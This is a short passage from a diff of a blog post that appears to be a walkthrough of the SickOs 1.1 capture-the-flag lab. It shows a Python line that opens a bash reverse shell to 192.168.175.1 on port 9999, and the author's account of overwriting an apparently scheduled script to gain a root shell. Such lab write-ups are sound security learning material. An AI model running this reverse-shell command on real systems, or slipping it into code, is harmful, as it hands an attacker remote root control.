mmmds/jekyll-now/_posts/2017-03-08-SickOs-11-Walkthrough.md

 	import os
 	os.system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.175.1/9999 0>&1'")

-I used existing shell to overwrite existing script with uploaded one, ran netcat on port 9999 and waited one minute until I got root shell.
+I used existing shell to overwrite script with uploaded one, then I ran netcat on port 9999 and waited one minute until I got root shell.

 [6]

 [7]